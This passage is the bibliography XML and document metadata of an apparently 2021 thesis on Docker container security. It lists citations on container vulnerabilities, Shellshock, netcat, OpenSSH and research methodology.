    <b:Year>2016</b:Year>
    <b:Pages>17-21</b:Pages>
    <b:RefOrder>78</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>JWe20</b:Tag>
    <b:SourceType>JournalArticle</b:SourceType>
    <b:Guid>{F61193A9-F08E-4CDB-A3F6-61FD99F8042C}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Wenhao</b:Last>
            <b:First>J</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Zheng</b:Last>
            <b:First>L</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>Vulnerability Analysis and Security Research of Docker Container</b:Title>
    <b:JournalName>2020 IEEE 3rd International Conference on Information Systems and Computer Aided Education (ICISCAE)</b:JournalName>
    <b:Year>2020</b:Year>
    <b:Pages>354-357</b:Pages>
    <b:RefOrder>79</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>BRM21</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{042033A5-491B-4F5D-A2F7-ABFF3CDC797A}</b:Guid>
    <b:Title>Positivism Research Philosophy</b:Title>
    <b:Author>
      <b:Author>
        <b:Corporate>BRM</b:Corporate>
      </b:Author>
    </b:Author>
    <b:ProductionCompany>Business Research Methodology</b:ProductionCompany>
    <b:YearAccessed>2021</b:YearAccessed>
    <b:MonthAccessed>July</b:MonthAccessed>
    <b:DayAccessed>19</b:DayAccessed>
    <b:URL>https://research-methodology.net/research-philosophy/positivism/</b:URL>
    <b:RefOrder>80</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>AMe18</b:Tag>
    <b:SourceType>JournalArticle</b:SourceType>
    <b:Guid>{6F1637EB-7CAA-488D-B466-193775C8E556}</b:Guid>
    <b:Title>Towards an Explicit Research Methodology: Adapting Research Onion Model for Futures Studies</b:Title>
    <b:Year>2018</b:Year>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Melnikovas</b:Last>
            <b:First>A</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:JournalName>Journal of Futures Studies</b:JournalName>
    <b:Pages>29-44</b:Pages>
    <b:Volume>23</b:Volume>
    <b:Issue>2</b:Issue>
    <b:RefOrder>81</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>PKO07</b:Tag>
    <b:SourceType>JournalArticle</b:SourceType>
    <b:Guid>{85537680-3787-4CA3-9F75-02E85D3464CC}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Overmars</b:Last>
            <b:First>P</b:First>
            <b:Middle>K.</b:Middle>
          </b:Person>
          <b:Person>
            <b:Last>Verburg</b:Last>
            <b:First>P</b:First>
            <b:Middle>H.</b:Middle>
          </b:Person>
          <b:Person>
            <b:Last>Veldkamp</b:Last>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>Comparison of a deductive and an inductive approach to specify land suitability in a spatially explicit land use model</b:Title>
    <b:JournalName>Land Use Policy</b:JournalName>
    <b:Year>2007</b:Year>
    <b:Pages>584-599</b:Pages>
    <b:Volume>24</b:Volume>
    <b:Issue>3</b:Issue>
    <b:RefOrder>82</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>CPo14</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{FAD5F9F2-F443-4275-BF4F-1226E9B460B6}</b:Guid>
    <b:Title>How to setup a workstation computer with Debian Wheezy and XFCE4</b:Title>
    <b:Year>2014</b:Year>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Pontikis</b:Last>
            <b:First>C</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Month>August</b:Month>
    <b:Day>24</b:Day>
    <b:YearAccessed>2021</b:YearAccessed>
    <b:MonthAccessed>August</b:MonthAccessed>
    <b:DayAccessed>21</b:DayAccessed>
    <b:URL>https://www.pontikis.net/blog/workstation-setup-debian-wheezy-xfce4</b:URL>
    <b:RefOrder>83</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Alp21</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{97D98862-3757-4EEE-BA82-B6F4E7E4E4A7}</b:Guid>
    <b:Title>Alpine Linux</b:Title>
    <b:ProductionCompany>Alpine Linux</b:ProductionCompany>
    <b:YearAccessed>2021</b:YearAccessed>
    <b:MonthAccessed>August</b:MonthAccessed>
    <b:DayAccessed>24</b:DayAccessed>
    <b:URL>https://www.alpinelinux.org/</b:URL>
    <b:RefOrder>84</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>CMa15</b:Tag>
    <b:SourceType>JournalArticle</b:SourceType>
    <b:Guid>{1C8182B3-1440-4C26-86EB-A0F9FBC13CC3}</b:Guid>
    <b:Title>Shellshock attack on linux systems--bash</b:Title>
    <b:Year>2015</b:Year>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Mary</b:Last>
            <b:First>C</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:JournalName>International Research Journal of Engineering and Technology</b:JournalName>
    <b:Pages>1322-1325</b:Pages>
    <b:Volume>2</b:Volume>
    <b:Issue>8</b:Issue>
    <b:RefOrder>85</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>JPe21</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{71EC5D11-5C42-4CDD-823E-2D9FCA27AEC2}</b:Guid>
    <b:Title>How to Use Netcat Commands: Examples and Cheat Sheets</b:Title>
    <b:Year>2021</b:Year>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Petters</b:Last>
            <b:First>J</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Month>March</b:Month>
    <b:Day>25</b:Day>
    <b:YearAccessed>2021</b:YearAccessed>
    <b:MonthAccessed>August</b:MonthAccessed>
    <b:DayAccessed>23</b:DayAccessed>
    <b:URL>https://www.varonis.com/blog/netcat-commands/</b:URL>
    <b:RefOrder>86</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>ubu21</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{C3275C7A-CA20-449C-BD3A-302384DE9130}</b:Guid>
    <b:Author>
      <b:Author>
        <b:Corporate>ubuntu</b:Corporate>
      </b:Author>
    </b:Author>
    <b:Title>OpenSSH Server</b:Title>
    <b:ProductionCompany>ubuntu</b:ProductionCompany>
    <b:YearAccessed>2021</b:YearAccessed>
    <b:MonthAccessed>August</b:MonthAccessed>
    <b:DayAccessed>28</b:DayAccessed>
    <b:URL>https://ubuntu.com/server/docs/service-openssh</b:URL>
    <b:RefOrder>87</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>doc213</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{028B866C-8307-481A-A0C7-B19FCDC2F2D6}</b:Guid>
    <b:Title>docker-openssh-server</b:Title>
    <b:YearAccessed>2021</b:YearAccessed>
    <b:MonthAccessed>August</b:MonthAccessed>
    <b:DayAccessed>28</b:DayAccessed>
    <b:URL>https://github.com/linuxserver/docker-openssh-server</b:URL>
    <b:RefOrder>88</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>cur21</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{B14BDBE9-1787-4498-997C-8D351A5F2255}</b:Guid>
    <b:Title>curl</b:Title>
    <b:YearAccessed>2021</b:YearAccessed>
    <b:MonthAccessed>August</b:MonthAccessed>
    <b:DayAccessed>28</b:DayAccessed>
    <b:URL>https://curl.se/</b:URL>
    <b:RefOrder>90</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Apa21</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{710E47C0-7243-4B38-993E-E7870ADFBF4B}</b:Guid>
    <b:Title>Apache Tutorial: Dynamic Content with CGI</b:Title>
    <b:YearAccessed>2021</b:YearAccessed>
    <b:MonthAccessed>August</b:MonthAccessed>
    <b:DayAccessed>28</b:DayAccessed>
    <b:URL>https://httpd.apache.org/docs/2.4/howto/cgi.html</b:URL>
    <b:RefOrder>89</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Lin18</b:Tag>
    <b:SourceType>JournalArticle</b:SourceType>
    <b:Guid>{FDDB3123-E339-4C4E-B4D0-33C58D39091A}</b:Guid>
    <b:Title>A Measurement Study on Linux Container Security: Attacks and Countermeasures</b:Title>
    <b:Year>2018</b:Year>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Lin</b:Last>
            <b:First>X</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Lei</b:Last>
            <b:First>L</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Wang</b:Last>
            <b:First>Y</b:First>
          </b:Person>
          <b:Person>
            <b:Last>et.el</b:Last>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:JournalName>Proceedings of the 34th Annual Computer Security Applications Conference</b:JournalName>
    <b:Pages>418-429</b:Pages>
    <b:RefOrder>54</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>BDo21</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{AE1FCA33-F423-4ED0-8447-ACB9E34C5BCE}</b:Guid>
    <b:Title>10+ top open-source tools for Docker security</b:Title>
    <b:Author>
      <b:Author>
        <b:Corporate>B Doerrfeld</b:Corporate>
      </b:Author>
    </b:Author>
    <b:ProductionCompany>TechBeacon</b:ProductionCompany>
    <b:YearAccessed>2021</b:YearAccessed>
    <b:MonthAccessed>September</b:MonthAccessed>
    <b:DayAccessed>2</b:DayAccessed>
    <b:URL>https://techbeacon.com/security/10-top-open-source-tools-docker-security</b:URL>
    <b:RefOrder>91</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>BWo17</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{F7D2269C-86F5-4541-87D0-D43C507341C1}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Wootton</b:Last>
            <b:First>B</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>Contino</b:Title>
    <b:ProductionCompany>Contino</b:ProductionCompany>
    <b:Year>2017</b:Year>
    <b:Month>January</b:Month>
    <b:Day>31</b:Day>
    <b:YearAccessed>2021</b:YearAccessed>
    <b:MonthAccessed>October</b:MonthAccessed>
    <b:DayAccessed>21</b:DayAccessed>
    <b:URL>https://www.contino.io/insights/whos-using-docker</b:URL>
    <b:RefOrder>1</b:RefOrder>
  </b:Source>
</b:Sources>
</file>

<file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{AFC29A51-4613-4679-A731-395E853A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46597</TotalTime>
  <Pages>90</Pages>
  <Words>22769</Words>
  <Characters>129785</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Yohannes Woldesilassie Zerzghi (P151368)</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Yohannes Woldesilassie</cp:lastModifiedBy>
  <cp:revision>4761</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-08-05T00:12:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-11-03T19:18:00Z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4a43a01d-d6c8-35f1-b91d-fd6225db7f97</vt:lpwstr>
  </property>
</Properties>
</file>